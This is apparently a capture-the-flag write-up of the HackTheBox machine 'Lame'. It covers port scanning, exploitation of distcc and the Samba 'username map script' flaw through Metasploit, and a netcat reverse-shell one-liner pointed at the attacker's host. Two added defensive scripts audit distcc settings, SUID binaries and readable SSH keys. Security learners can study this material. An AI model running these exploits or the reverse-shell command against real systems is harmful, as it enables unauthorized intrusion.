Lame

Super easy box. Good for absolute beginners.

Initial Nmap scan

sudo nmap -sS -sV -p- -Pn -n --disable-arp-ping -T4 -v 10.10.10.3

21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open microsoft-ds?
3632/tcp open distccd?
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Anonymous FTP login is allowed, but there are no files inside:

ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:sweps): anonymous
331 Please specify the password.
Password:
230 Login successful.

Checking searchsploit for a vsFTPd 2.3.4 exploit:

------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metas | unix/remote/17491.rb
------------------------------------------------- ---------------------------------

No luck with the Metasploit module for a quick win:

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.

Next up, running Nmap's NSE vuln scripts against the open ports shows that the distcc service is vulnerable to CVE-2004-2687:

3632/tcp open distccd
| distcc-cve2004-2687:
| VULNERABLE:
| distcc Daemon Command Execution
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2004-2687
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Allows executing of arbitrary commands on systems running distccd 3.1 and
| earlier. The vulnerability is the consequence of weak service configuration.
|
| Disclosure date: 2002-02-01
| Extra information:
|
| uid=1(daemon) gid=1(daemon) groups=1(daemon)
|
| References:
| https://distcc.github.io/security.html
| https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
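The NSE result above attributes the distcc finding to weak service configuration, so the defender-side counterpart is a configuration check. The shell script below is an added example and not part of the original writeup: it audits a Debian-style /etc/default/distcc file (the LISTENER and ALLOWEDNETS variable names are an assumption about that file's layout, not something taken from the box) and reports settings that expose the daemon beyond the local host or a single site network. The two sample files it writes are constructed.

```shell
#!/bin/sh
# Added example, not from the original writeup. Audits a Debian-style
# /etc/default/distcc (assumed layout: LISTENER and ALLOWEDNETS variables)
# for settings that expose distccd to untrusted clients.

# Read the last KEY=value or KEY="value" assignment from a shell-style
# defaults file; prints nothing when the key is absent or commented out.
cfg_get() {
    sed -n "s/^[[:space:]]*$2=[\"']\{0,1\}\([^\"']*\)[\"']\{0,1\}.*/\1/p" "$1" | tail -n 1
}

# Print one finding per line; prints nothing when the file looks acceptable.
check_distcc_defaults() {
    listener=$(cfg_get "$1" LISTENER)
    nets=$(cfg_get "$1" ALLOWEDNETS)

    # An empty or wildcard listener binds the daemon on every interface.
    case "$listener" in
        ""|0.0.0.0|::) echo "LISTENER='$listener': daemon binds every interface" ;;
    esac

    # Every client is allowed when the list is empty or contains a /0 prefix.
    if [ -z "$nets" ]; then
        echo "ALLOWEDNETS is empty: no client network restriction configured"
    else
        for n in $nets; do
            case "$n" in
                */0) echo "ALLOWEDNETS entry '$n' allows every client" ;;
            esac
        done
    fi
    return 0
}

# Constructed sample files: the first resembles the kind of exposure the NSE
# script above detected, the second a daemon restricted to one subnet.
write_samples() {
    weak=$(mktemp) && hardened=$(mktemp)
    printf 'STARTDISTCC="true"\nLISTENER="0.0.0.0"\nALLOWEDNETS="0.0.0.0/0"\n' > "$weak"
    printf 'STARTDISTCC="true"\nLISTENER="10.10.10.3"\nALLOWEDNETS="10.10.10.0/24"\n' > "$hardened"
    echo "$weak $hardened"
}

# Stand-alone run; on a real host: check_distcc_defaults /etc/default/distcc
set -- $(write_samples)
echo "== weak =="; check_distcc_defaults "$1"
echo "== hardened =="; check_distcc_defaults "$2"
rm -f "$1" "$2"
```

The check only reads the defaults file; whether the running daemon actually honours it is a separate question, so pair it with a look at the distccd command line in the process list.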


Quick search in Metasploit:

Matching Modules
================

# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/misc/distcc_exec 2002-02-01 excellent Yes DistCC Daemon Command Execution

The exploit works and returns a reverse shell:

[*] Started reverse TCP double handler on 10.10.14.32:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo qvtycnDuLZsZpLEM;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "qvtycnDuLZsZpLEM\r\n"
[*] Matching...
[*] A is input...
ls
[*] Command shell session 1 opened (10.10.14.32:4444 -> 10.10.10.3:40534) at 2021-10-06 05:29:56 -0400

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Terrible shell, so instead spawn a reverse shell with nc and upgrade it with Python:

nc -nv 10.10.14.32 6666 -e /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'
daemon@lame:/tmp$

Found some SSH keys but no luck with them; will come back to those later. Decided to check the SMB ports next, as this is a very easy rated box, so there should be low-hanging fruit somewhere to get root:

searchsploit Samba 3.0.20
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py

An msfconsole search turns up a module with an excellent rating:

3 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution

[*] Started reverse TCP handler on 10.10.14.32:6666
[*] Command shell session 1 opened (10.10.14.32:6666 -> 10.10.10.3:38760) at 2021-10-06 06:00:34 -0400
id
uid=0(firefart) gid=0(root)

Mitigations:

Keep the system up to date.

Conclusion

This box showed how easy it is for outdated systems to be compromised with a point-and-click methodology. One exploit gave a user shell, the other went straight from boot to root. There were also SSH keys in the root folder which should not have been readable, and the nmap binary had the SUID bit set. So there were quite a few easy escalations on this box, hence the name “Lame”.
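The conclusion lists two local weaknesses beyond the outdated services: an SUID nmap binary and private SSH keys that other users could read. The shell script below is an added example and not part of the original writeup: it audits a filesystem tree for both conditions, using an assumed allowlist of binaries that normally carry the SUID bit. It runs against a constructed directory tree containing placeholder files so it works offline; on a real host it would be pointed at /.

```shell
#!/bin/sh
# Added example, not from the original writeup. Audits a filesystem tree for
# the two local weaknesses the conclusion lists: SUID binaries outside an
# expected set (the nmap finding) and private SSH keys readable by other
# users (the root folder finding). On a real host call: audit_host /

# Binaries that legitimately carry the SUID bit on a typical Debian/Ubuntu
# host. Assumed allowlist; tune it per host.
SUID_ALLOW="passwd su sudo mount umount ping chsh chfn newgrp"

# Report SUID files under $1 whose basename is not in SUID_ALLOW.
find_unexpected_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | while read -r f; do
        base=$(basename "$f")
        case " $SUID_ALLOW " in
            *" $base "*) ;;                      # expected SUID binary, skip
            *) echo "SUID: $f" ;;
        esac
    done
}

# Report group- or world-readable files under $1 whose first line is a PEM
# private-key header (covers id_rsa, id_ed25519 and any copied key file).
find_readable_keys() {
    find "$1" -type f \( -perm -040 -o -perm -004 \) 2>/dev/null | while read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q 'PRIVATE KEY-----'; then
            echo "KEY: $f"
        fi
    done
}

audit_host() {
    find_unexpected_suid "$1"
    find_readable_keys "$1"
}

# Constructed sample tree standing in for a host's filesystem. It reproduces
# the two findings (SUID nmap, readable key in /root/.ssh) next to a correct
# SUID passwd and a properly protected user key. The key files are
# placeholders, not real keys.
build_sample_tree() {
    sample_root=$(mktemp -d)
    mkdir -p "$sample_root/usr/bin" "$sample_root/root/.ssh" "$sample_root/home/user/.ssh"
    printf '#!/bin/sh\n' > "$sample_root/usr/bin/passwd"
    chmod 4755 "$sample_root/usr/bin/passwd"
    printf '#!/bin/sh\n' > "$sample_root/usr/bin/nmap"
    chmod 4755 "$sample_root/usr/bin/nmap"
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' '(constructed placeholder)' > "$sample_root/root/.ssh/id_rsa"
    chmod 644 "$sample_root/root/.ssh/id_rsa"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' '(constructed placeholder)' > "$sample_root/home/user/.ssh/id_ed25519"
    chmod 600 "$sample_root/home/user/.ssh/id_ed25519"
    echo "$sample_root"
}

# Stand-alone run against the constructed tree.
tree=$(build_sample_tree)
audit_host "$tree"
rm -rf "$tree"
```

The SUID check is deliberately allowlist based: a binary not on the list is reported even if it is harmless, which is the right default for an audit, and the list is the part to maintain per host.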